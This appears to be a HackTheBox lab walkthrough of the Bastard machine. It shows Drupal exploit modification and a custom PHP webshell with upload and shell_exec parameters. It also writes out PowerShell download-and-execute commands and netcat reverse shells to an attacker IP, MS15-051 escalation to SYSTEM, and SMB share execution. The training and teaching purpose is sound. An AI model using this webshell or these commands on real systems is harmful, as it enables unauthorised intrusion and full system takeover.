Bastard Hackthebox

Disassembly of ippsec’s youtube video HackTheBox - Bastard. Windows box without the use of Metasploit, a few different ways to enumerate the privesc. Managing cookies importing/exporting. Exploit modification/testing. Setting up Burp Suite to capture an exploits traffic and SMB file execution with impacket.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

nmap scan:

1
nmap -sC -sV -oA nmap 10.10.10.9

(output)

Port 80 - web-server IIS Port 135 - Windows RPC Port 49154 - Windows RPC

Based on the above ports we can guess that this is a Windows Server, not so obvious that this ins a Windows Server 2008 R2 because the IIS version is 7.5

google IIS versions

version 9 was skipped basically due to a potential lazy programmer

web-server

Drupal web-server, we can use a script called *droopescan* Github Link: https://github.com/droope/droopescan

“droopescan” normally takes quite a bit of time (few thousand requests)

1
./droopescan scan drupal -u 10.10.10.9

(results after 45min)

Note: there is another drupal scanner called “drupscan” but the downside is that it has not been updated.

default drupal files

/CHANGELOG.txt is a default file on installations.

we can enumerate the version number as “7.54” published 2017.

google drupal exploits

the first post:

using an “unserialized()” can receive remote code execution. With in the exploit we can see that it is directly intended for version “7.54”

second, sign of confirmation was the date of the post being March 2017:

Searchsploit Drupal

1
searchsploit drupal

7.X looks familar and might be the exploit just seen in the blog post.

View exploit:

1
searchpsloit -x php/webapps/41564.php

This is the blog post exploit

Various ways to clone a copy of the exploit, personally I like the -m which mirrors the exploit to the working directory but IppSec in this situation uses -p to copy to clip board, paste into working directory and renames the files to drupal.php:

dissembling the exploit

it’s a PHP script which would be considered odd but since this is using a serialization() exploit it makes sense.

Uses 3 section:

  1. Use the SQL INjection to get the contents of the cache for the current endpoint along with the admin credentials and hash
  2. After the cache to allow us to write a file and o so
  3. Restore the cache

modify exploit

change the url:

change filename, which was originally a linux php which might have issues with the windows box:

create custom php webshell within exploit

adding a custom webshell as a new variable:

1
2
3
4
5
6
7
8
9
10
11
12
$phpCode = <<<'EOD'
<?php
  if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.15.1:8000/" . $_REQUEST['fupload]));
  };
  if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
  };
?>
EOD;

# code corrected to final and in working state

Check for code errors:

1
1
1
1
1
php drupal.php

syntax error line 80

1
2
vi drupal.php
:80 # goes to line 80

remove the “us.”

re-run

1
1
1
1
1
php drupal.php

code executes correctly.

test php code interactive mode

1
php -a

paste the code and call the variable *$phpCode*

there is a mistake with the “</pre”;” is not closed off.

correct line:

Exploit against Web-Server

1
1
1
1
1
php drupal.php

failed to login.

pipe to Burp to see process

simplest way to push this php script through burp change the bind port under options:

Request handling tab - redirect all request from 10.10.10.9 to port 80:

tick box for Proxy Listeners:

Navigate to 127.0.0.1:8090

Edit drupal.php to reflect the new 127.0.0.1:8090

re-run exploit against webserver

make sure burp intercept is on:

change to intercept client (untick: Content type):

1
1
1
1
1
php drupal.php

at this point we can analyze everything the server says back to us.

burp/modify exploit code directory

right off the bat there is two slashes in the beginning (requires fixing)

Response:

404 error Not Found - due to the double slashes

through multiple guessing “dumb luck” it was discovered that removing the slash and “endpoint” that a 200 Response occurs. If had not found that directory the next step would have been to preform a dirbuster scan or gobuster to find said directory:

(return)

final modified exploit

changed url to target, changed the endpoint path and ensured that there was no extra slash at the end of the url:

RCE

1
1
1
1
1
php drupal.php

navigating to directory

file exists and now we can pass systems commands directly via the browser URL

1
10.10.10.19/ippsec.php?fexec=dir

we have remote code execution

investigating files from exploit

1
cat user.json

Could try cracking this password which looks like it the ID of the drupal user.

1
cat sessions.json

Import session cookies into firefox > Tools > Cookies Manager+ > Cookies Manager+

copy the “session_name”

paste in Add new cookie:

copy “session_id”

paste in Add new cookie:

save/close:

at this point if we refresh the page we will be sending the administrator cookie to the web-server

Hello admin” in the top right corner.

Enumerating Windows

Firstly, view environment,

1
10.10.10.9/ippsec.php?fexec=systeminfo

In this scenario the hotfixes are “N/A” meaning this version of windows has never been updated.

Looking at the OS Version: 6.1.7600 N/A Build 7600 indicates that there is no service pack installed.

What we know now: Microsoft Windows Server 2008 R2 Datacenter 6.7.7600 N/A Build 7600 (no service packs installed) “Maybe” no hotfixes installed

Second, look into Kernal privesc (keep in mind these exploits have the potential for BSoD) Run PowerUp.ps1

1
2
locate PowerUp.ps1
cp /opt/Empire/data/module_source/privesc/PowerUp.ps1 . #copies to local directory

edit PowerUp.ps1 and add Invoke-AllChecks at bottom:

Setup SimpleHTTPServer

1
python -m SimpleHTTPServer

Windows target download file:

1
2
10.10.10.9/ippsec.
php?fexec=echo "IEX(New-Object Net.WebClient)DownloadString('http://10.10.15.1:8000/PowerUp.ps1')

Pipe to powershell

1
10.10.10.9/ippsec.php?fexec=echo "IEX(New-Object Net.WebClient)DownloadString('http://10.10.15.1:8000/PowerUp.ps1') | powershell -noprofile -

the piping is performed to get execution. (results after a bit of time)

we get an unquoted service denied which can be tested with

1
10.10.10.9/ippsec.php?fexec=sc query state= all

once we privesc we’ll run this command again and see if we can access.

In this situation as well we can not “Checking service executable and argument permissions” - Start/Stop a service (second check)

Unable to “Check service permissions…” - if we could overwrite the permissions of a server.

We have the ability to “potientally “takeover” DLL locations…”

which we would have the ability to take over Oracle files, meaning if we could restart oracle we could get code execution.

Check for if oracle is running

1
10.10.10.9/ippsec.php?fexec=netstat -an

we see MySQL is running on port 3306, don’t see oracle which is normally like 1521 and this point we can skip this avenue.

Continue analyzing the PowerUp.ps1:

The rest of the report doesn’t lead to a way to escalation. Another script that is really liked is “Sherlock.ps1”

Copy Sherlock.ps1 to working directory:

Manage Unicode

1
dose2unix Sherlock.ps1

Edit “Sherlock.ps1” to inlude “Find-AllVulns” at the bottom of the script.

upload “Sherlock.ps1” to target

1
1
10.10.10.9/ippsec.php?fexec=echo "IEX(New-Object Net.WebClient)DownloadString('http://10.10.15.1:8000/Sherlock.ps1') | powershell -noprofile -

Sherlock.ps1 Results:

all basically says is to migrate to a 64bit process.

windows nc for reverse-shell

Windows notoriously does not have the best way to setup a reverse shell as to if we download a copy of it to the box we could use it to aid in the reverse shell.

Netcat x86 (32-bit) & x64 Link: https://eternallybored.org/misc/netcat/

Extract and move to working directory and upload to target:

1
10.10.10.9/ippsec.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.15.1 8081

since the file is being upload we can execute it directly after that.

RUN

Reverse-Shell

setup listener

1
nc -lvnp 8081

(response)

we have entered flavor country with a new shell in hand.

sherlock inside shell

1
1
10.10.10.9/ippsec.php?fexec=echo "IEX(New-Object Net.WebClient)DownloadString('http://10.10.15.1:8000/Sherlock.ps1') | powershell -noprofile -

(results)

now works correctly as our netcat file was an x64 application. In this situation it saying that the 15-051 is not vulnerable but that is not actually the case.

bit of cheating (ms exploits)

Having prior knowledge that the box is vulnerable to MS15-051

google MS15-051 proof of concept

download MS15-051-KB3045171.zip and extract to local directory. Now if this was a real pentest you would download the source file inspect for backdoors and then compile locally before using it on the system.

Root&Loot

upload MS15-051 file to target:

1
10.10.10.9/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami

NT AUTHORITY/SYSTEM

setup NT Authority/System shell

Listener:

1
nc -lvnp 8082

Sending to another shell:

1
10.10.10.9/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e cmd 10.10.15.1 8082"

(return)

extra tips

If for any reason you do not see hotfixes you can go to the following directory and verify:

1
cd \Windows\SoftwareDistribution\Download

temporary location of WSUS updates

Windows update log:

1
C:\Windows>type WindowsUpdate.log

will tell you when its installing patches.

Executing files off UNC shares - OSCP lateral movement (firewalls would generally prevent this ) (Simliar HTTPServer but for Samba) Kali has a built in impacket-smbserver which then you give it a share name and a directory you would want to share out:

1
impacket-smbserver ippsec `pwd`

rename ms15-051x64.exe to privesc.exe

target connect to smb server

1
10.10.10.9/ippsec.php?fexec=\10.10.15.1\ippsec\privesc.exe whoami

impacket see’s the incoming connection:

verifies that the target indeed interacted with the server.

Browser returns: NT AUTHORITY\SYSTEM

#HAILippsec


If you don’t know who ippsec is check him out at:

Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

Twitter: https://twitter.com/ippsec